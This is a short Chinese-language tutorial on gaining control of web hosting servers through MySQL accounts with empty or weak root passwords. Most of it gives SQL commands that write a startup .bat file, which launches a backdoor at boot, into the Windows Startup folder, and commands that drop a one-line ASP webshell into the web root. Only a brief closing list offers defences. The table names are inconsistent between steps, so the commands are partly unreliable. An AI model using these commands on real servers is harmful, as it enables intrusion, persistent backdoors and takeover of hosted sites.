问题对象:有虚拟主机空间商.网站服务器
过程:建立一个表→在表中输入我们的提权内容→出表→完成
1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器.
2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马.
3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件
4.虚拟主机提供商,自己给我们的mysql账号和密码.
一
创建新表,开机自启动,来得到cmd,其命令如下:
1:创建一个新的表
create table hx小龙 (cmd text);
含义:创建了一个新的表,表名为bycnboytest,表中只存放一个字段,字段名为cmd,为text文本]
二是:运行我们的后门木马之类的东西.大家自己灵活.
insert into hx小龙 values ("(路径)c:\cmd11.exe " );
三:输出表为一个bat的脚本文件
select * from bycnboytest into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\54td.bat";
导出一个文件文:54td.bat(c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\此路径才为开机自启动)
二
导出一句木马类:
执行:show databases; 看服务器中有些什么数据库
use test;进入数据库
show tables;查看我们进入数据库中有些什么数据表
create table hx小龙123 (cmd text); 创建一个新的表
insert into hx小龙123 values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容
select * from hx小龙123 into outfile "(导出到网站物理路径如):D:\www\web\54td.asp";
应对措施:
将上方的启动目录,设置为不可写
安装关机还原等软件
网站重要文件进行加密等。
